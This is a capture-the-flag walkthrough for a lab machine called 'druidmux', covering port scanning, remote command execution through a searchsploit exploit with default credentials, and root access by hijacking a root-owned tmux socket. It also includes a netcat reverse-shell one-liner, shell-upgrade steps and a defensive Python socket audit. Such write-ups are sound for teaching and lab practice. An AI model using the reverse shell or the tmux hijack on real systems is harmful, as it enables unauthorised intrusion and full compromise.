druidmux

#### By b13ss3d ####

There's also a video version available if you prefer visual walkthroughs.

Port Scanning

We begin our reconnaissance by performing a port scan using Rustscan to identify open ports on the target system.

❯ rustscan -a 10.0.160.67

<SNIP>
Open 10.0.160.67:80

After identifying the open ports, we use Nmap to gather more detailed information about the services and their versions running on these ports.

nmap -p80 -sCV -n -Pn -v 10.0.160.67 -oN scan
<SNIP>
Nmap scan report for 10.0.160.67
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)

Nmap command options explained:

  • -p <ports>: scan only the specified ports.

  • -sCV: combines the options -sC and -sV.

  • -sC: equivalent to --script=default.

  • -sV: Probe open ports to determine service/version info.

  • -n: Never do DNS resolution.

  • -v: Increase verbosity level.

  • -oN <file>: Output scan in normal format.

The scan reveals a web server running on port 80. Let's investigate the website's content using a web browser:

Gaining Initial Access

Using searchsploit, we discover several exploits for this software. One of them allows for remote command execution:

Let's copy this exploit to our current directory:

Now, we'll execute the exploit using default credentials:

After successful execution, we gain the ability to run commands on the target system:

To improve our access, let's obtain a reverse shell. First, set up a listener using netcat:

Then, execute the following command on the target to establish a reverse shell connection, nc -e /bin/bash <your IP> <your PORT>, like this:

You should receive a connection immediately:

To upgrade this basic shell to a fully interactive terminal, follow these steps:

  1. Execute: script /dev/null -qc bash

  2. Press CTRL + Z

  3. Run: stty raw -echo;fg

  4. Finally, execute: reset xterm and press Enter

Privilege escalation

List the running processes with the command ps -feaw:

We notice that root is executing tmux with the following command: tmux -S /tmp/shareds new -d -s shared /bin/bash -l

Let's break down this command:

  1. tmux: The base command to start tmux.

  2. -S /tmp/shareds: Specifies the socket location. In this case, it uses a custom socket in /tmp/shareds instead of the default socket.

  3. new: Indicates that a new session will be created.

  4. -d: This option starts the new session in "detached" mode. This means the session is created but you're not immediately attached to it.

  5. -s shared: Assigns a name to the session. In this case, the session will be called "shared".

  6. /bin/bash -l: This is the command that will run in the new session. In this case, it starts a bash shell with the -l option, which makes it behave like a login shell.

We can exploit this configuration to escalate our privileges. For more information on this technique, refer to the HackTricks resource on tmux session hijacking.
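As an added defender-side check, not part of the original writeup: the function below walks a directory for UNIX sockets that belong to another user and are group- or world-writable, which is the condition a root-owned tmux socket like /tmp/shareds needs before an unprivileged user can attach to the session. The socket it inspects is constructed for the demonstration; make_demo_socket and demo are helpers assumed here, not tmux's or the CTF's own code.

```python
import os
import socket
import stat
import tempfile
from typing import List, Optional, Tuple

def audit_tmux_sockets(directory: str, my_uid: Optional[int] = None) -> List[Tuple[str, int, str]]:
    """Return (path, owner_uid, mode) for UNIX sockets under `directory` that another
    user owns and that are group- or world-writable (group hits need a membership
    check). connect(2) requires write permission on the socket inode, so such a
    root-owned tmux socket lets a local user attach; /tmp's sticky bit is no defence."""
    if my_uid is None:
        my_uid = os.getuid()
    findings = []
    for root, _dirs, files in os.walk(directory):  # sockets are listed among files
        for name in files:
            path = os.path.join(root, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # entry vanished or is unreadable; skip it
            if not stat.S_ISSOCK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if st.st_uid != my_uid and mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, st.st_uid, oct(mode)))
    return findings

def make_demo_socket(directory: str, mode: int) -> str:
    """Create a constructed socket named like the writeup's /tmp/shareds, with `mode`."""
    path = os.path.join(directory, "shareds")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    srv.bind(path)        # bind() creates the socket inode on disk
    os.chmod(path, mode)  # set the mode explicitly rather than relying on umask
    srv.close()           # the inode stays behind for the audit to find
    return path

def demo(mode: int, as_other_user: bool) -> int:
    """Build a socket in a temp dir and return the audit's finding count. Unprivileged
    code cannot chown to root, so 'another user' is simulated by auditing with a
    uid different from the socket owner's. Mode 0o700 is the fix (tmux's default
    /tmp/tmux-<uid>/ directory gives the same effect); 0o777 reproduces the bug."""
    with tempfile.TemporaryDirectory() as tmp:
        make_demo_socket(tmp, mode)
        uid = os.getuid() + 1 if as_other_user else os.getuid()
        return len(audit_tmux_sockets(tmp, my_uid=uid))

if __name__ == "__main__":
    print("0777 socket seen by another user:", demo(0o777, True))  # 1 finding
    print("0700 socket seen by another user:", demo(0o700, True))  # 0 findings
```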

To gain root access, simply create a new session using the socket utilized by root:

And voila! We now have root privileges:

Flag Locations

The flags can be found in the following locations:

  • /root

  • /etc/passwd

  • /etc/shadow

  • /proc/1/environ

  • http://druidmux/ETSCTF.html
